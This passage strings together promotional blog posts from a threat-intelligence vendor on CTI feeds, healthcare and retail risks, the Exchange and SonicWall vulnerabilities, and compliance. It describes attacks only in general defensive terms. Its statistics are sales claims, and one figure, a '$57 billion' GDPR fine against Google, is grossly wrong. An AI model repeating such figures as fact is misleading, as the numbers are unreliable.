networks contain compromised hosts that are already exfiltrating data, and nearly all networks find unexpected traffic. CleanINTERNET’s traffic analysis and deep packet inspection quickly give you visibility of these threats and show you what threat actors see when scanning your network. By aggregating, managing, and delivering thousands of cyber threat intelligence feeds for you, we dramatically decrease the number of false positives your business gets, alleviating the burden on your security team and making existing security tools more viable. CleanINTERNET saves millions of dollars on separate CTI feeds, offering immeasurable security at an affordable price and making us one of the best solutions for securing healthcare organizations. Get in touch with our team to find out more about cyber threat intelligence for the healthcare industry. Stay tuned for our next blog on the cybersecurity challenges facing the legal sector. --- ### [Microsoft Exchange Vulnerabilities and Targeted Attacks](https://www.centripetal.ai/blog/microsoft-exchange-vulnerabilities-attacks) Published: 2021-03-09 Summary: On Tuesday, March 2nd, Microsoft published KB5000871[1] that contained security updates for vulnerabilities in Microsoft Exchange. On Tuesday, March 2nd, Microsoft published KB5000871 that contained security updates for vulnerabilities in Microsoft Exchange. These vulnerabilities have been identified being exploited as zero-day in the wild prior to the release of these updates. Microsoft recommends applying the security patches from this knowledgebase article immediately to mitigate these vulnerabilities. Reports from across the cybersecurity community detail these vulnerabilities being exploited with the goal of further establishing foothold and control of on-premises Exchange instances for the purpose of credential and email theft, as well as delivering additional malware including ransomware. Additional tools and resources are available from the vendor, such as an MSERT tool to assist in detection and additional information on the technical vulnerability fixes included in the security updates as well as additional information on vulnerability mitigation. Centripetal also has additional tools, resources, and information for clients available upon request. CleanINTERNET Mitigation: The initial exploit requires attackers be able to establish an untrusted connection to the Exchange server on TCP port 443; CleanINTERNET inherently identifies and stops these attacks in their reconnaissance phase on a massive scale. To further meet this threat, Centripetal has also curated specific Indicators of Compromise (IoCs) from multiple sources and added them to the dynamic intelligence feeds applied for CleanINTERNET customers. --- ### [Reducing the Cost of Cyber Threat Intelligence](https://www.centripetal.ai/blog/reducing-cost-cyber-threat-intelligence) Published: 2021-02-23 Summary: Cyber threat intelligence feeds are one of the most efficient ways of compiling large amounts of data in one place. But, each feed is costly. As the cost of the average cyber breach increases, now hitting up to $4million per breach, cybersecurity costs have become a vital consideration for businesses, no matter their size. In fact, around half of all cyberattacks target small or medium-sized businesses, necessitating a solution that is low in cost but high in protection. Aggregating cyber threat intelligence feeds is one of the most efficient ways of compiling large amounts of threat data in one place, providing an early warning system for potential indicators of compromise. However, each provider’s feeds can cost between $30,000 and $500,000, with data overlap between feeds requiring multiple purchases to get a holistic view of incoming threats. Many businesses also find that cybersecurity costs inflate due to security vendors’ professional service fees, license fees, and frequent updates. In addition, most of these feeds are proprietary, limiting the scalability to obtain a comprehensive solution. Shrinking Budgets To make matters worse, cybersecurity budgets are shrinking rapidly. Worldwide spending on information security and risk management technology and services grew by only 2.4% during 2020, well below the estimated growth of 8.7%. This budget decrease, exacerbated by the coronavirus pandemic, has led many cybersecurity professionals to feel that they are not keeping up with rising threat levels, impacting their cybersecurity posture and enabling cybercriminals to achieve more successful attacks. Small and mid-sized organizations, who don’t have the specialized staff or the revenue of larger businesses, can find it particularly challenging to purchase the right threat intelligence solutions, learn how to effectively use them, and correctly leverage the data they provide. The global cybersecurity skills gap puts further strain on corporate budgets and cybersecurity costs, with skill shortages in cybersecurity now directly affecting millions of professionals. This makes it difficult to recruit and retain highly skilled cyber threat analysts to leverage the information that threat feeds provide. A lack of adequate cybersecurity staff or a lack of training has a direct impact on the business’ cybersecurity posture, allowing cyber threats to slip through the cracks and cause cyber security incidents. CleanINTERNET Instead of spending millions of dollars on various cyber threat intelligence feeds, your business can spend a fraction of that and receive comprehensive cyber threat intelligence with CleanINTERNET. CleanINTERNET aggregates thousands of CTI feeds and delivers personalized findings and shielding recommendations straight to you, saving you the cost of purchasing separate feeds and avoiding data overlap or gaps in pertinent threat data. By delivering actionable insights directly to you, our elite team of cyber threat analysts act as an extension of your existing team, eliminating the challenge of the skills gap. By aggregating, managing and delivering CTI feeds for you, Centripetal’s CleanINTERNET solution delivers an immediate ROI, with our threat intelligence expertise as part of the total cost. Alleviating the skills gap challenge from your business allows productivity and efficiency to flourish. Our service is designed to fit any budget and any organization of any size, so get in touch with the Centripetal team to find out more about CleanINTERNET for your business. --- ### [The Layered Security Approach](https://www.centripetal.ai/blog/layered-security-approach-cleaninternet) Published: 2021-02-09 Summary: A layered security approach allows businesses to identify threats more efficiently, prevents financial loss, and improves security posture. Cyber threats are constantly increasing in complexity, with billions of records being exposed by data breaches in 2020 alone. These cybersecurity attacks include phishing, ransomware, Distributed Denial of Services (DDoS), and Man-in-the-Middle (MitM) attacks, with new malware and viruses being discovered every day. Complicated and multi-prong threats necessitate layered security, ensuring that there are no security gaps for hackers to exploit. Layered cybersecurity It’s standard practice for organizations to layer security systems to monitor multiple control points throughout their network, actively detecting incoming threats and ensuring that every defense component has a backup to counter gaps in protection. A layered approach might consist of firewalls, secure configuration, malware protection, secure email gateways, endpoint protection, user access control, and a number of other security tools. With each different security solution acting as a separate failsafe, the business doesn’t have to rely solely on built-in firewalls. A layered defense typically allows the business to identify threats more efficiently, preventing financial loss and improving overall cyber security posture. Many vendors position themselves as an ‘all in one’ solution but often fall short in areas where they lack expertise. All-purpose solutions can fail to innovate their products consistently or stay on top of the vast amount of evolving cyber threats. To cost-effectively and proactively stay on top of cyber threats, your business needs to employ best-of-breed cyber threat intelligence that complements and enhances your existing security layers. CleanINTERNET Centripetal CleanINTERNET provides greater visibility of threats across your security systems without overwhelming your employees, applying real-time monitoring, automated shielding, and advanced threat detection. We do this by leveraging over 3,500 cyber threat intelligence feeds, shielding ‘all risk’ threats automatically, and analyzing all remaining threats for you. We then deliver our comprehensible, relevant findings to your team directly, acting as an extension of your security team and saving your business millions in separate threat feed costs. Our expert cyber analysts are aware of new and emerging threats, easing the burden on your teams and making threat intelligence effortless. CleanINTERNET prevents network infiltration and data exfiltration, alleviating alert fatigue for your security staff and improving the longevity of your existing security stack. Get in touch with the Centripetal team to find out more about enhancing layered security with cyber threat intelligence. --- ### [Simplifying Cyber Threat Intelligence](https://www.centripetal.ai/blog/simplifying-cyber-threat-intelligence) Published: 2021-01-29 Summary: By employing next-generation cyber threat intelligence, the burden on security staff is lifted, allowing you to focus on critical activities. In battling the constant threat of security breaches, many organizations rely on solutions that provide real-time security alerts. The average enterprise employs dozens of tools, leaving security teams inundated with cyber threat intelligence and focused on multiple interfaces every day. Unsurprisingly, organizations find multi-vendor environments challenging, particularly when faced with tightening budgets and an already overworked cyber security team. The fact is security alerts have doubled over the last five years for 70% of security teams. Almost every cyber security team admits that the high volume of alerts causes problems for their security staff, with over half experiencing ‘alert fatigue’ as a result. This can cause security teams to become complacent, allowing important alerts to slip through the cracks and potentially causing irreversible damage to the business. The pressure of keeping up with increasing alerts and maintaining multiple solutions can lead security professionals to feel stressed, with 54% either leaving a role due to overwork and burnout, or knowing someone else who has. Additionally, the cost of implementing and maintaining multiple security solutions can complicate the process. Budgets are shrinking, with Gartner projecting a 2.4% increase in worldwide spending on information security and risk management technology and services during 2020, well below the 8.7% growth it had estimated before the coronavirus pandemic. This decrease in funding is having a direct effect on enterprises’ cyber security posture, with 82% of cyber security professionals reporting that security budgets are not keeping up with rising threat levels. Many security vendors also complicate their costs with various professional service fees, licence fees, and frequent updates. Finding simplicity in Cyber Threat Intelligence The good news is that by employing next-generation cyber threat intelligence, the burden on security staff can be lifted, streamlining and simplifying cyber security operations and allowing you to focus on your mission-critical business activities. While some security solutions rely on your team to understand and analyze cyber threats, or even lock down systems so strictly that it affects your business’ productivity, we offer a simpler solution. Centripetal CleanINTERNET operationalizes a growing base of over 3,500 cyber threat intelligence feeds, utilizing dynamic cyber threat intelligence at mass scale to identify what’s relevant for your business and shielding “all-risk” threat traffic to protect your network. Our cyber threat analysts act as an extension of your team, reporting back to you with the threats that matter, alleviating the burden on your security team, reducing alert fatigue and saving significant costs of subscribing and managing cyber threat feeds. The Centripetal team provides personalized support from day one, ensuring that implementation is effortless for your team, whether on-premise, cloud-based, or hybrid environments. CleanINTERNET enables you to level the playing field against advanced cyber threats, simplifying security operations and improving your security posture in the process. Speak to our team to find out how you can simplify cyber threat intelligence for your entire organization. --- ### [CleanINTERNET x Mid-Atlantic Cyber](https://www.centripetal.ai/blog/cleaninternet-midatlantic-cyber-threat) Published: 2021-01-21 Summary: Mid-Atlantic Cyber’s Founder and President, sat down with us to discuss what it’s like working with Centripetal and CleanINTERNET. Getting ahead of the curve on the cyber threat landscape Maintaining the upper hand against cyber threats to guard against network intrusion means employing the right tools to keep you informed of potential and real threats. Mid-Atlantic Cyber, an organization offering physical security and infrastructure solutions, has been utilizing our cyber threat intelligence service, CleanINTERNET, for over four years. Mid-Atlantic Cyber’s Founder and President, Chris Mannix, sat down with us to discuss what it’s like working with the Centripetal team and leveraging the CleanINTERNET service. https://www.youtube.com/watch?v=L6JAr-B-lQI “The Centripetal CleanINTERNET service, in real-time, is doing something unique and different than the other security stack and firewall componentry that we’ve used traditionally.” Over the past 20 years, Mid-Atlantic Cyber have had to evolve their physical security and infrastructure offering to keep their customers’ networks protected. With customers originally coming to Mid-Atlantic Cyber for security cameras and access control systems, it wasn’t long before these systems needed to be connected to the internet, making them susceptible to cyber attack. The organization knew that they needed a robust solution to protect their customers from increasing cyber threats. Chris Mannix and his team started to look for new and compelling solutions to add to their security stack, looking to get as close to real-time threat intelligence as possible and use this intelligence to protect both their own corporate infrastructure and their clients’. Mid-Atlantic Cyber knew how important it was to protect their networks without locking things down too strictly, as productivity can then suffer. They also needed a solution that was cost-effective and simple to implement. Four years ago, the organization started working with Centripetal’s CleanINTERNET solution across their two branch offices and one data center. The solution provided Mid-Atlantic Cyber with visibility of their security posture across all of their sites, and helped their customers understand what the solution does and its cost benefits. CleanINTERNET allowed the business to benefit from comprehensive threat intelligence reports and logs, alerting them to potential threats while simultaneously shielding against malicious activity. Mid-Atlantic Cyber has found Centripetal’s SOC and NOC resources particularly beneficial, allowing them to analyze and identify areas for improvement within their environment. By engineering their solution to include Centripetal CleanINTERNET, Mid-Atlantic Cyber has been able to shield against threats that would have gone undetected through their firewalls, as well as seeing a reduction in signal-to-noise. Since working with Mid-Atlantic Cyber, Centripetal has shielded a vast number of threats, including active attacks attempting to circumvent corporate DNS security at a client data center, unauthorized scanning by threat actors, and fake anti-virus scams. In December 2020 alone, CleanINTERNET used 457 cyber threat intelligence feeds to shield 2,369,303 threats from 212,772 unique IoC’s targeting Mid-Atlantic Cyber. “The human contact with the Centripetal experts has been really refreshing and educational for me and my team.” Implementing CleanINTERNET has allowed the Mid-Atlantic Cyber team to relinquish control of cyber security operations to the Centripetal team, giving them the opportunity to focus on developing their solution and nurturing new business relationships, with confidence that their infrastructure, and their customers’, are protected. After previously expanding Mid-Atlantic Cyber to include cyber security, Chris Mannix retained the cyber side of the business and sold the physical side; a decision that was made possible thanks to his confidence in Centripetal’s solution. “It’s very exciting to feel like we’re getting ahead of the curve on the cyber threat landscape.” Doing the best job for your customers means leveraging every credible piece of threat intelligence and using the best technology that’s available. Centripetal’s CleanINTERNET solution operationalizes a growing base of cyber threat intelligence feeds to deliver comprehensive protection at an exceptional value. With CleanINTERNET, your organization can easily see any internal issues that need to be remediated and external threats that need to be shielded, and with Centripetal’s threat analysts operating as an extension of your cyber team, you can focus on your business in the knowledge that your customers’ data is safe. Find out how Centripetal CleanINTERNET delivers immediate value to your cyber security initiatives by getting in touch with our team. --- ### [Next-Generation Cyber Threat Intelligence For Your Business](https://www.centripetal.ai/blog/next-gen-threat-intelligence-business) Published: 2020-12-17 Summary: Cyber Threat Intelligence is vital for businesses to mitigate and understand current and future threats targeting an enterprise. The cyber threat landscape is constantly expanding, with security breaches increasing by 67% since 2014 and the cost of cyber crime expected to be $6 trillion annually by 2021. As threats are evolving and advancing at an alarming rate, threat actors utilize automation to overwhelm security teams and force organizations to re-evaluate their cyber security posture in order to face these new forms of attack. A new generation of cyber threats requires a new generation of Cyber Threat Intelligence. Cyber Threat Intelligence is vital for businesses to mitigate and understand current and future threats targeting an enterprise, but many organizations struggle to fully realize the benefits as they lack the necessary technology to make the intelligence accessible, the resources to analyze threat intelligence, and many are already overwhelmed by the volume of alerts and false positives. There is no longer time to detect now and react later. Next-generation Cyber Threat Intelligence means leveraging the expertise of professionals and external vendors to review cyber threat intelligence data, as well as utilizing advanced detection technologies such as AI. AI introduces anomaly detection and classification to threat intelligence and detection, with machine learning enabling the identification of risks and solutions and providing a more informed threat response. Centripetal CleanINTERNET Centripetal CleanINTERNET pioneers next-generation threat intelligence; our zero-trust inspection of all traffic, powered by proactive intelligence, is the most advanced strategy in network security today. We leverage over 100 sources of cyber threat intelligence with over 3,500 feeds to efficiently determine which threats are real and which aren’t, utilizing AI-driven identification. CleanINTERNET shields clearly “all risk” threat traffic, rather than simply blocking, preventing data infiltration without disrupting business processes. Our team of cyber threat analysts identify, analyze, and report on threats for you, delivering precise, actionable insights to your organization, enabling you to stay ahead of current and future threats. Get in touch with the Centripetal team to harness the power of next-generation Cyber Threat Intelligence within your business. --- ### [Maintaining Security With Remote Working](https://www.centripetal.ai/blog/remote-working-security-tips) Published: 2020-12-08 Summary: The push to remote working introduces risks to cybersecurity, due to employees using personal devices, increasing the risk of security gaps. 88% of organizations worldwide mandated their employees to work from home in 2020 to slow the spread of COVID-19. And with the pandemic looking to leave office buildings empty for the foreseeable future, organizations are having to embrace new ways of working. Remote working on the rise Even pre-pandemic, remote working numbers have been steadily increasing as people realize the cost-saving, mental health and sustainability benefits of working from home. However, the push to remote working practices introduces risks to cybersecurity, due to employees using personal devices which lack adequate protection, increasing the risk of endpoint security gaps and email-based cyber threats. This has led to a noticeable uptick in cybersecurity crimes across the board. Over 1 in 10 employees have had video calls hacked while working remotely, and 46% have noticed an increase in phishing attempts in recent months. Almost half of global businesses have had at least one security scare since shifting to remote working this year, with the FBI’s Internet Crime Complaint Center now receiving 3,000 to 4,000 calls per day, compared to 1,000 a day before the pandemic. As a consequence, employees are feeling increasingly distressed, with 59% claiming they feel more secure working in the office compared to at home. The unexpected expenses involved in recovering from data breaches have also hit organizations hard, as many are still coping with pandemic-related financial losses. Ease the security burden Centripetal CleanINTERNET eases the security burden on your entire team, whether they are working from home or in the office. Your business is able to focus on mission-critical operations while our cyber threat analysts operationalize over 3,500 cyber threat intelligence feeds, shielding against “all risk” threat traffic and delivering actionable findings to you directly, wherever you’re working. With your team able to gain immediate visibility into the relevant threats, realizing your cyber security strategies and initiatives is made easier. Centripetal’s CleanINTERNET service protects against network infiltration and data exfiltration and dramatically increases your cyber security posture. Find out more about securing your network with CleanINTERNET by getting in touch. Our next blog will explore next-generation cyber threat intelligence and what it means for your business. --- ### [CleanINTERNET Blocks Potential Exploit Attempts](https://www.centripetal.ai/blog/cleaninternet-blocks-exploitation-attempts) Published: 2020-11-24 Summary: Centripetal’s CleanINTERNET service was able to defend the network from attacks published hours earlier through the power of applied CTI. Centripetal Networks observed 472,584 potential exploitation attempts from Iraq targeting a SonicWall VPN host only hours after SonicWall published advisory SNWLID-2020-0010. Centripetal’s CleanINTERNET service was able to block all of these inbound attempts targeting the vulnerable infrastructure in order to defend the environment. This advisory was assigned CVE-2020-5135 with a CVSSv3 of 9.4 as it can be launched through unauthenticated traffic to establish Denial of Service and potentially Remote Code Execution conditions. At the time of the announcement, there were up to 800k potentially vulnerable SonicWall devices available on the Internet. The 472k attacks were directed at the host and do not appear to be random port scans or otherwise expect Internet noise. These scans targeted TCP port 443 individually across all of the attempts and were launched in two very specific attack windows. The first scan comprised of 212k events, occurred on Monday, October 12th, 2020 at 10:53:49 UTC and continued until 16:51:38 UTC. The second scan was an additional 260k events beginning on Tuesday, October 13th, 2020 at 06:59:01 UTC and continued until 13:12:43 UTC. Again, all attacks targeted only TCP port 443 – interestingly there were 1,793 separate attacker IPs used to create this traffic. It is worth noting that there were two ICMP events from Iraq as well, one before the scans and one after. These ICMP packets were blocked by the CleanINTERNET service as well to protect from reconnaissance based attacks. Centripetal’s CleanINTERNET service was able to defend the network from attacks published only hours earlier through the power of applied Cyber Threat Intelligence. Centripetal Network’s CleanINTERNET service is able to deliver proactive network protection by leveraging Cyber Threat Intelligence (CTI) to identify and prevent threats. Additionally, layering geographic based IP location allows the CleanINTERNET service to block attacks from undesirable or unwanted countries across the globe. Timeline Monday, October 12th 2020: SonicWall releases SNWLID-2020-0010 Monday, October 12th 2020 @ 10:53:49 UTC Attack began and targeted TCP port 443 only on the victim IP Utilized 512 separate attacking IPs from Iraq, attempting to evade firewalls 5.62.128.0/24 and 5.62.136.0/24 networks 212k attacks over this six hour period Tuesday, October 13th 2020 @ 06:59:01 UTC Second large attack against TCP 443 only again Utilized 1,281 separate IPs 260k additional attacks over another 8 hour period   References https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0010 https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-5135 https://www.tripwire.com/state-of-security/vert/sonicwall-vpn-portal-critical-flaw-cve-2020-5135/ • https://threatpost.com/critical-sonicwall-vpn-bug/160108/ --- ### [Cybersecurity Challenges for Retailers](https://www.centripetal.ai/blog/cybersecurity-challenges-retailers) Published: 2020-11-19 Summary: Black Friday and Cyber Monday are the most important days for the retail industry, yet they create a host of cybersecurity challenges. Retail is one of the most vulnerable and targeted industries when it comes to cyber attacks, with half of U.S. retailers experiencing a data breach in 2019, up 19% from the year before. Marking the start of the busy holiday shopping period, Black Friday and Cyber Monday are the most important days for retailers worldwide, with the average adult shopper planning to spend $400 on Black Friday sales. Unfortunately, the holiday season provides the perfect opportunity for cyber criminals to steal sensitive data as IT teams are focused on the influx of traffic. A rush to Ecommerce Shopping choices look set to shift in 2020, with the global pandemic putting a stop to the usual Black Friday in-store shopping rush and increasing the number of customers shopping online. Google’s US shopper survey found that 75% of consumers plan to buy online more than they did last year, with many retailers already seeing a surge in online purchases since local COVID-19 lockdowns were put in place. Many retailers adopt new technologies and platforms to avoid system downtime and provide a smoother customer experience during online sales peaks, which can leave them vulnerable to attacks leading to sensitive data breaches. These threats can come in the form of phishing campaigns, fraudulent sites designed to divert web traffic, or distributed denial of service (DDoS) attacks in which hackers bombard servers with requests until they slow down or crash completely. In 2019, Kaspersky research identified a number of phishing scams claiming to be seasonal discounts from brands that were almost indistinguishable from the real thing. Cybersecurity Attacks Cyber attacks can damage retailers in many more ways than just the loss of sales over the holiday season. There is potential for legal sanctions and considerable non-compliance fines when businesses have not met regulations such as the GDPR, CCPA, or the PCI Standard, as well as irreversible reputational damage and the potential loss of loyal customers. Damage to the brand is especially detrimental in the retail sector, where competition is fierce and switching providers is so easy. When hackers around the world are constantly evolving their techniques to hit retailers of all sizes from point of sale to online payment, encryption is simply not enough. Malicious actors are smart, aware of any opportunities or weak links in the eCommerce chain. To ensure that sales volumes grow during the festive shopping period, retailers have to adopt a multi-layered approach to security, increasing their cyber awareness and identifying potential threats quickly, without diverting attention from business operations. A comprehensive solution Centripetal’s comprehensive cyber threat intelligence solution, CleanINTERNET, acts as an extension of your security team, easing the burden on your staff and alleviating the security skills gap. CleanINTERNET aggregates and leverages over 3,500 threat intelligence feeds from over 70 sources, delivering the most relevant and actionable findings to your business and allowing your team to focus on mission-critical business operations during the busy festive season. To find out more about increasing your cybersecurity posture and mitigating cyber threats this holiday season, speak to one of the Centripetal team. As many offices remain closed, organizations are looking at how they can make long-term remote working easier. Our next blog explores how CleanINTERNET supports and protects the new remote workforce. --- ### [Mitigating Data Breaches within Healthcare](https://www.centripetal.ai/blog/mitigating-data-breaches-healthcare) Published: 2020-11-03 Summary: 89% of US healthcare organizations have experienced a data breach in the past two years. As the industry evolves, so do the security challenges. Last week, the US government warned hospitals and healthcare providers of an increased and imminent ransomware threat, linked directly to Eastern European hackers. The FBI, the DHS’s Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) have all received credible information that threat actors are targeting the healthcare sector with the TrickBot malware, before deploying Ryuk, a particularly aggressive piece of ransomware, into their networks. Both TrickBot and Ryuk have been previously linked to threat actors operating in Russia. Hitting Healthcare Hitting the healthcare sector during a global pandemic and in the final days before the presidential election, Charles Carmakal, SVP and CTO of security firm Mandiant described the attacks as “the most significant cybersecurity threat we’ve ever seen in the United States.” By deliberately targeting US hospitals, the threat actor forces patients to be diverted to other healthcare providers, prolonging the wait time to receive critical care. “Multiple hospitals have already been significantly impacted by Ryuk ransomware and their networks have been taken offline. UNC1878 is one of most brazen, heartless, and disruptive threat actors I’ve observed over my career”, Carmakal explained. US healthcare organizations have been among some of the most high-profile victims of data breaches over the last few years, with 89% of healthcare organizations experiencing a breach in the past two years. Their huge volumes of highly monetizable patient data makes them particularly attractive to attackers, and as digital transformation brings more systems to the attack surface like MRI scanners, smart drug infusion pumps, and patient identification systems, the threat only continues to grow. Taking this information, Centripetal's team immediately began countering the cyber threat by collecting, curating, and operationalizing relevant intelligence from all available sources and started working hand-in-hand with healthcare customers to ensure safe and stable operations in the face of this targeted credible threat. The Centripetal team consistently performs cyber threat hunting for all clients, and in this case, approximately 75% of the IoCs that was curated by Centripetal were not available in high-confidence threat intelligence. New Challenges Healthcare also has the highest data breach costs at $429 per record, and because of the highly sensitive patient data at risk, and the threat to patient welfare if key systems are offline, 23% of healthcare organizations suffering a breach offered some form of payment to attackers. As healthcare organizations have evolved, they now use a wide spread of heterogeneous cloud and on-premise IT systems, introducing new security challenges. This is complicated by the large number of mobile staff that make up healthcare organizations, and their need to share data and access records urgently. Our cyber threat intelligence solution, CleanINTERNET®, aggregates and leverages over 3,500 threat intelligence feeds to deliver comprehensible, actionable findings to prevent network infiltration and data exfiltration. With CleanINTERNET, you can alleviate the burden on your security team, increasing the overall efficiency of the security stack. Find out how healthcare providers can greatly benefit from Centripetal’s CleanINTERNET by speaking with one of our team. --- ### [Bridging the Cybersecurity Skills Gap](https://www.centripetal.ai/blog/bridging-cybersecurity-skills-gap) Published: 2020-10-22 Summary: Security breaches have increased by 67% since 2014. This has resulted in a cybersecurity skills gap that is consistently growing. Security breaches have increased by 67% since 2014, and (ISC)2 have reported that the global security workforce has to increase by 145% to cope with a surge in demand for cybersecurity professionals. This rise in demand has resulted in a cybersecurity skills gap that is consistently growing. The Cybersecurity Skills Gap Over half of cybersecurity professionals (51%) have claimed that their organization is at moderate or extreme risk due to staff shortages, with over 4 million positions in the industry left unfilled. Companies in industries from healthcare to government are facing the global scarcity of properly trained cyber security personnel, and it threatens to drive the number of damaging data breaches, particularly for small and mid-sized businesses. Additionally, in an industry that evolves so quickly due to digital transformation initiatives and innovative technologies, it’s hard for organizations and individuals to keep up with relevant training. 67% of cyber security professionals admit that training is hard to keep up with because of the demands of their jobs, and only 38% say that their organizations provide training and education on the latest threats. A lack of formal education also contributes to the cybersecurity skills gap; only 42% of the top 50 computer science programmes in US universities offer three or more information security-specific courses for undergraduates. The skills shortage exacerbates the number of data breaches that occur, with the top two contributing factors to security incidents being a lack of adequate training of non-technical employees (31%) and a lack of adequate cybersecurity staff (22%). Small and mid-sized businesses are especially vulnerable to the side effects of the cyber security skills gap. In 2017, 61% of data breaches were directed at companies with fewer than 1000 employees. Attackers exploit these smaller organizations because they know that there are fewer employees with the right skills to defend against them; only 30% of smaller companies have an employee-training program in place to guard against and recover from breaches. As well as losing revenue on damage control and non-compliance fines after a data breach, one in four organizations say that insufficient cyber security staff strength has damaged their reputation with customers. This, in turn, increases the workload on existing employees, leading to high stress working environments, with 38% of cyber security professionals claiming that the skills shortage has led to high burnout rates and staff attrition. With fewer employees and less revenue than larger organizations, small and mid-sized businesses cannot divert time and money away from business operations to hire new staff or continuously train existing employees. Bridging the gap Centripetal’s CleanINTERNET bridges the cybersecurity skills gap by leveraging our experienced team of cyber threat analysts that act as an extension of your security team. By operationalizing over 70 core Cyber Threat Intelligence (CTI) providers that contain over 3,500 cyber threat feeds, our elite cyber threat analysts create and update policies to increase your cyber security posture and alleviate the burden of recruiting and retention in a highly restricted talent market. From the onset, our team delivers the required experience and skill to realise your cyber security strategies and initiatives. Find out more about alleviating the cybersecurity skills gap within your business by speaking with one of our team. --- ### [Maintaining Regulatory Compliance in a Complex Framework](https://www.centripetal.ai/blog/maintaining-regulatory-compliance) Published: 2020-10-08 Summary: It’s a complex and time-consuming process to identify and maintain regulatory compliance. Mitigate the risk of non-compliance with CleanINTERNET. Businesses have to maintain regulatory compliance with multiple regulations and keep data classification and governance up to par; something which is difficult given the sheer amount of data organizations hold. 53% of companies keep over 1,000 sensitive files accessible to every employee and interconnectivity further complicates the compliance process, with many organizations now using cloud and third-party providers. This is particularly daunting for small and mid-sized organizations that cannot divert revenue and staff away from business operations. Stand-out recent regulations include GDPR and CCPA, but the number of frameworks is constantly increasing. These include PIPEDA, KVKK, India's Personal Data Protection Bill, Brazil’s General Data Privacy Law, Australia’s Notifiable Data Breaches Act, the Personal Data Protection Act in Thailand, and further industry-specific regulations such as HIPAA. Many companies find that they have to comply with multiple frameworks simultaneously, and 10% of US companies are actively working to comply with 50 or more privacy laws. It’s therefore a complex and time-consuming process to identify and meet the requirements of the relevant frameworks. With the consequences becoming more and more severe, not complying to regulations is riskier than ever. In 2019, Google was fined $57 billion for GDPR violations by CNIL, a French data protection agency. In large companies, regulatory compliance is handled by compliance or risk officers, but in small and mid-sized enterprises, this usually falls into the hands of employees who often have no specialist compliance knowledge. All organizations should ensure their networks are safe and compliant, despite the size of their team. This issue is exacerbated by the existing cyber security skills gap, which has left 65% of businesses with a shortage of cyber security staff, and 54% of UK organizations lacking the skills or confidence to carry out basic cyber security tasks such as creating back-ups, managing admin rights, and arranging automatic software updates. The skills gap isn’t the only thing complicating compliance for mid-market organizations; the costs are often extremely high. On average, businesses spend $1.3 million to meet compliance requirements and are expected to put in an additional $1.8 million towards future potential issues. Regulatory requirements in the US cost $10,000 per employee on average, and as compliance is a continuous and evolving process, not a one-off cost, these costs grow with time. Non-compliance fines often cost more than twice the average cost of maintaining compliance and 31% of consumers feel their overall experience with companies has improved since the GDPR was enacted, making complying to regulatory frameworks a vital business cost. With breaches occurring every day, small and mid-sized organizations cannot risk costly fines, lost revenue and the associated reputational damage. It’s important for these businesses to implement a cyber security solution that will enable their compliance efforts, not hinder them. Centripetal understands the importance of maintaining compliance with the right regulatory frameworks. Our cyber threat intelligence solution, CleanINTERNET, continuously identifies threats using dynamic intelligence on a mass scale by leveraging over 3,500 threat intelligence feeds, saving your internal team valuable time for other compliance activities. Our threat analyst team acts as an extension of your security team, using our expertise and delivering comprehensible, actionable findings to you directly. With CleanINTERNET, you can remove the financial burden of implementing complex CTI systems and instead focus your revenue and time on mission-critical business operations. Speak to one of our team about mitigating the risk of non-compliance with Centripetal’s CleanINTERNET threat intelligence solution. One of the key barriers to compliance for small and mid-sized organizations is the cyber security skills gap. In our next blog, we will discuss alleviating this skills gap by utilising our team of cyber threat analysts. --- ### [Improve Cyber Resilience Without Disrupting Business Operations](https://www.centripetal.ai/blog/improving-cyber-resilience-business) Published: 2020-09-23 Summary: Security activities have traditionally been in a seesaw balance of improving cyber resilience without the disruption of business operations. For organizations trying to improve cyber resilience, security activities and business operations have traditionally been in a seesaw balance of increasing security measures to mitigate against ever-increasing and complex threats, without the disruption of business operations. Organizations that implement a cyber security strategy by creating unrealistic policies risk interrupting the business processes and losing customers, partners, staff, or other legitimate sources trying to access their infrastructure. Early cyber security systems involved employing specialized staff to scour the Internet daily for malicious or potentially dangerous sources, which would be listed as an IP reputation list (blacklist) that was uploaded to the firewall/IDS/IPS. The effectiveness of blacklisting is limited as hackers are alerted to the fact that their attack has reached a dead end, allowing them to stop in their tracks and come up with a new strategy, rather than deterring them. Skillful malicious actors also often use ‘disposable’ dial-up connections to constantly change IP addresses and avoid being blocked, making the lifespan of one address just a few hours. Over $7m in cryptocurrency was stolen in 2019 after a blacklisting system failed to protect a compromised account. So not only will blocking result in customers being wrongly rejected and possibly taking their business to a competitor, hackers won’t have a hard time returning and attacking again. 2nd Generation As we move into the 2nd generation of threat intelligence, businesses need to refrain from simply blocking potential threats and consider cyber resilience solutions that do not disrupt the smooth running of business operations. The best way to prevent network infiltration and data exfiltration and allow business processes to continue seamlessly is by shielding against all known threats. Shielding reduces risk and liability, as well as easing the noise on the back-end security stack, increasing the organization’s security posture and cyber resilience by minimizing risk factors as much as possible. As malicious sources are carefully verified, shielding is highly effective in preventing data infiltration. Bi-directional shielding adds another dimension – preventing data exfiltration to a known malicious source. Since these sources are known, there are few if any false positives and no disruption to the business process. No business interruption Centripetal understands the cost of business interruption, which is why we shield, from the outset and throughout, against all known sources of malicious activity. Our threat intelligence solution, CleanINTERNET, forms a virtual shield against “all risk traffic”, before analyzing all other events proactively through our cyber threat analysts that deliver their findings to you directly. Centripetal reduces SIEM/firewall alerts by up to 70%, alleviating the burden on your firewall administrators by up to 90% and increasing the efficiency of the security stack. Find out more about CleanINTERNET’s threat shielding capabilities and the benefits for your organization. --- ### [Implementing and Maintaining Cyber Threat Intelligence](https://www.centripetal.ai/blog/maintaining-cyber-threat-intelligence) Published: 2020-09-08 Summary: With cybersecurity spending projected to eclipse $43 billion, organizations are increasingly willing to invest far more into cyber threat intelligence capabilities. With annual cyber security spending projected to eclipse $43 billion by the end of 2020, organizations are increasingly willing to invest far more into cyber threat intelligence capabilities. However, with vendors charging up to $100,000 for their security tools and support, and the growing cyber security skills shortage affecting 76% of organizations, installation can be expensive and employees may be unable to manage it. In many cases, these technologies end up left misconfigured or not effectively utilized. This is particularly prevalent for mid-sized organizations who do not have specialized cyber security teams and rely on smaller IT teams who in most cases do not possess all of the skills or experience to implement a cyber threat intelligence solution. Many problems stem from implementation issues that arise during configuration, which can cause various vulnerabilities into the network. Security misconfiguration accounts for 82% of security vulnerabilities and has lead to catastrophic data breaches, such as the 2019 Teletext exposure of 530,000 data files. Even when implemented and configured properly, operational challenges can and do occur. With multiple feeds needed for wider 